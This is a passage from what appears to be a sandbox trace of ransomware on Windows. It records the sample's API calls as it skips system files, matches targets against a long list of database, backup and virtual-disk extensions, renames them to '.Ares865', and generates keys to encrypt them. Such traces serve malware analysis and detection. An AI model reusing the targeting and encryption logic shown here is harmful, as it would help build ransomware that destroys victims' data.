(lpString1="dll", lpString2="cdb") returned 1 [0088.302] lstrlenW (lpString="ckp") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.302] lstrlenW (lpString="cma") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.302] lstrlenW (lpString="cpd") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.302] lstrlenW (lpString="dacpac") returned 6 [0088.302] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.302] lstrlenW (lpString="dad") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.302] lstrlenW (lpString="dadiagrams") returned 10 [0088.302] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.302] lstrlenW (lpString="daschema") returned 8 [0088.302] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.302] lstrlenW (lpString="db-journal") returned 10 [0088.302] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.302] lstrlenW (lpString="db-shm") returned 6 [0088.302] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.302] lstrlenW (lpString="db-wal") returned 6 [0088.302] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.302] lstrlenW (lpString="dbc") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.302] lstrlenW (lpString="dbs") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.302] lstrlenW (lpString="dbt") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.302] lstrlenW (lpString="dbv") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.302] lstrlenW (lpString="dbx") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.302] lstrlenW (lpString="dcb") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.303] lstrlenW (lpString="dct") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.303] lstrlenW (lpString="dcx") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.303] lstrlenW (lpString="ddl") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.303] lstrlenW (lpString="dlis") returned 4 [0088.303] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.303] lstrlenW (lpString="dp1") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.303] lstrlenW (lpString="dqy") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.303] lstrlenW (lpString="dsk") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.303] lstrlenW (lpString="dsn") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.303] lstrlenW (lpString="dtsx") returned 4 [0088.303] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.303] lstrlenW (lpString="dxl") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.303] lstrlenW (lpString="eco") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.303] lstrlenW (lpString="ecx") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.303] lstrlenW (lpString="edb") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.303] lstrlenW (lpString="epim") returned 4 [0088.303] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.303] lstrlenW (lpString="fcd") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.303] lstrlenW (lpString="fdb") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.303] lstrlenW (lpString="fic") returned 3 [0088.303] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.303] lstrlenW (lpString="flexolibrary") returned 12 [0088.303] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.303] lstrlenW (lpString="fm5") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.304] lstrlenW (lpString="fmp") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.304] lstrlenW (lpString="fmp12") returned 5 [0088.304] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.304] lstrlenW (lpString="fmpsl") returned 5 [0088.304] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.304] lstrlenW (lpString="fol") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.304] lstrlenW (lpString="fp3") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.304] lstrlenW (lpString="fp4") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.304] lstrlenW (lpString="fp5") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.304] lstrlenW (lpString="fp7") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.304] lstrlenW (lpString="fpt") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.304] lstrlenW (lpString="frm") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.304] lstrlenW (lpString="gdb") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.304] lstrlenW (lpString="gdb") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.304] lstrlenW (lpString="grdb") returned 4 [0088.304] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.304] lstrlenW (lpString="gwi") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.304] lstrlenW (lpString="hdb") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.304] lstrlenW (lpString="his") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.304] lstrlenW (lpString="ib") returned 2 [0088.304] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.304] lstrlenW (lpString="idb") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.304] lstrlenW (lpString="ihx") returned 3 [0088.304] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.305] lstrlenW (lpString="itdb") returned 4 [0088.305] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.305] lstrlenW (lpString="itw") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.305] lstrlenW (lpString="jet") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.305] lstrlenW (lpString="jtx") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.305] lstrlenW (lpString="kdb") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.305] lstrlenW (lpString="kexi") returned 4 [0088.305] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.305] lstrlenW (lpString="kexic") returned 5 [0088.305] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.305] lstrlenW (lpString="kexis") returned 5 [0088.305] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.305] lstrlenW (lpString="lgc") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.305] lstrlenW (lpString="lwx") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.305] lstrlenW (lpString="maf") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.305] lstrlenW (lpString="maq") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.305] lstrlenW (lpString="mar") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.305] lstrlenW (lpString="marshal") returned 7 [0088.305] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.305] lstrlenW (lpString="mas") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.305] lstrlenW (lpString="mav") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.305] lstrlenW (lpString="maw") returned 3 [0088.305] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.305] lstrlenW (lpString="mdbhtml") returned 7 [0088.305] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.306] lstrlenW (lpString="mdn") returned 3 [0088.306] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.306] lstrlenW (lpString="mdt") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.307] lstrlenW (lpString="mfd") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.307] lstrlenW (lpString="mpd") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.307] lstrlenW (lpString="mrg") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.307] lstrlenW (lpString="mud") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.307] lstrlenW (lpString="mwb") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.307] lstrlenW (lpString="myd") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.307] lstrlenW (lpString="ndf") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.307] lstrlenW (lpString="nnt") returned 3 [0088.307] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.308] lstrlenW (lpString="nrmlib") returned 6 [0088.308] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.308] lstrlenW (lpString="ns2") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.308] lstrlenW (lpString="ns3") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.308] lstrlenW (lpString="ns4") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.308] lstrlenW (lpString="nsf") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.308] lstrlenW (lpString="nv") returned 2 [0088.308] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.308] lstrlenW (lpString="nv2") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.308] lstrlenW (lpString="nwdb") returned 4 [0088.308] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.308] lstrlenW (lpString="nyf") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.308] lstrlenW (lpString="odb") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.308] lstrlenW (lpString="odb") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.308] lstrlenW (lpString="oqy") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.308] lstrlenW (lpString="ora") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.308] lstrlenW (lpString="orx") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.308] lstrlenW (lpString="owc") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.308] lstrlenW (lpString="p96") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.308] lstrlenW (lpString="p97") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.308] lstrlenW (lpString="pan") returned 3 [0088.308] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.308] lstrlenW (lpString="pdb") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.309] lstrlenW (lpString="pdm") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.309] lstrlenW (lpString="pnz") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.309] lstrlenW (lpString="qry") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.309] lstrlenW (lpString="qvd") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.309] lstrlenW (lpString="rbf") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.309] lstrlenW (lpString="rctd") returned 4 [0088.309] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.309] lstrlenW (lpString="rod") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.309] lstrlenW (lpString="rodx") returned 4 [0088.309] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.309] lstrlenW (lpString="rpd") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.309] lstrlenW (lpString="rsd") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.309] lstrlenW (lpString="sas7bdat") returned 8 [0088.309] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.309] lstrlenW (lpString="sbf") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.309] lstrlenW (lpString="scx") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.309] lstrlenW (lpString="sdb") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.309] lstrlenW (lpString="sdc") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.309] lstrlenW (lpString="sdf") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.309] lstrlenW (lpString="sis") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.309] lstrlenW (lpString="spq") returned 3 [0088.309] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.309] lstrlenW (lpString="te") returned 2 [0088.310] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.310] lstrlenW (lpString="teacher") returned 7 [0088.310] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.310] lstrlenW (lpString="tmd") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.310] lstrlenW (lpString="tps") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.310] lstrlenW (lpString="trc") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.310] lstrlenW (lpString="trc") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.310] lstrlenW (lpString="trm") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.310] lstrlenW (lpString="udb") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.310] lstrlenW (lpString="udl") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.310] lstrlenW (lpString="usr") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.310] lstrlenW (lpString="v12") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.310] lstrlenW (lpString="vis") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.310] lstrlenW (lpString="vpd") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.310] lstrlenW (lpString="vvv") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.310] lstrlenW (lpString="wdb") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.310] lstrlenW (lpString="wmdb") returned 4 [0088.310] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.310] lstrlenW (lpString="wrk") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.310] lstrlenW (lpString="xdb") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.310] lstrlenW (lpString="xld") returned 3 [0088.310] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.310] lstrlenW (lpString="xmlff") returned 5 [0088.311] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.Ares865") returned 81 [0088.311] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.311] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=371552) returned 1 [0088.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.312] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.313] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.313] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ae60, lpName=0x0) returned 0x15c [0088.316] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ae60) returned 0x420000 [0088.363] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.363] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.364] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.367] CloseHandle (hObject=0x15c) returned 1 [0088.367] CloseHandle (hObject=0x118) returned 1 [0088.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.369] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d7a1200, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6d7a1200, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="..") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="windows") returned -1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="temp") returned -1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="boot") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.370] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0088.370] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0088.370] lstrcpyW (in: lpString1=0x2cce468, lpString2="SGRES.DLL.trx_dll" | out: lpString1="SGRES.DLL.trx_dll") returned="SGRES.DLL.trx_dll" [0088.370] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0088.370] lstrlenW (lpString="Ares865") returned 7 [0088.370] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.370] lstrlenW (lpString=".dll") returned 4 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".dll") returned 1 [0088.370] lstrlenW (lpString=".lnk") returned 4 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.370] lstrlenW (lpString=".ini") returned 4 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".ini") returned 1 [0088.370] lstrlenW (lpString=".sys") returned 4 [0088.370] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".sys") returned 1 [0088.370] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0088.370] lstrlenW (lpString="bak") returned 3 [0088.370] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.370] lstrlenW (lpString="ba_") returned 3 [0088.370] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.370] lstrlenW (lpString="dbb") returned 3 [0088.370] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.370] lstrlenW (lpString="vmdk") returned 4 [0088.370] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.371] lstrlenW (lpString="rar") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.371] lstrlenW (lpString="zip") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.371] lstrlenW (lpString="tgz") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.371] lstrlenW (lpString="vbox") returned 4 [0088.371] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.371] lstrlenW (lpString="vdi") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.371] lstrlenW (lpString="vhd") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.371] lstrlenW (lpString="vhdx") returned 4 [0088.371] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.371] lstrlenW (lpString="avhd") returned 4 [0088.371] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.371] lstrlenW (lpString="db") returned 2 [0088.371] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.371] lstrlenW (lpString="db2") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.371] lstrlenW (lpString="db3") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.371] lstrlenW (lpString="dbf") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.371] lstrlenW (lpString="mdf") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.371] lstrlenW (lpString="mdb") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.371] lstrlenW (lpString="sql") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.371] lstrlenW (lpString="sqlite") returned 6 [0088.371] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.371] lstrlenW (lpString="sqlite3") returned 7 [0088.371] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.371] lstrlenW (lpString="sqlitedb") returned 8 [0088.371] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.371] lstrlenW (lpString="xml") returned 3 [0088.371] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.372] lstrlenW (lpString="$er") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.372] lstrlenW (lpString="4dd") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.372] lstrlenW (lpString="4dl") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.372] lstrlenW (lpString="^^^") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.372] lstrlenW (lpString="abs") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.372] lstrlenW (lpString="abx") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.372] lstrlenW (lpString="accdb") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.372] lstrlenW (lpString="accdc") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.372] lstrlenW (lpString="accde") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.372] lstrlenW (lpString="accdr") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.372] lstrlenW (lpString="accdt") returned 5 [0088.372] lstrcmpiW 